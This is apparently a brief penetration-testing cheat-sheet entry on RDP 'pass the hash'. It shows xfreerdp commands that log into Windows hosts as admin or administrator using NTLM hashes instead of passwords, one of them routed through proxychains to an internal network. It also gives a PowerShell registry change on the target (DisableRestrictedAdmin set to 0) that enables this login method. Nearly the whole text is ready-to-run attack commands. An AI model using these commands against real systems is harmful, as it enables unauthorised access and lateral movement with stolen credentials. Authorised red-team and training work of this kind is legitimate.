RDP login with NTLM Hash

xfreerdp /u:admin /pth:2892d26cdf84d7a70e2eb3b9f05c425e /v:192.168.69.6 /cert-ignore

Enable RDP pass the hash on the Target Machine for example purpose:

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Then to pass the hash with RDP to Target_Machine:

proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore

Last updated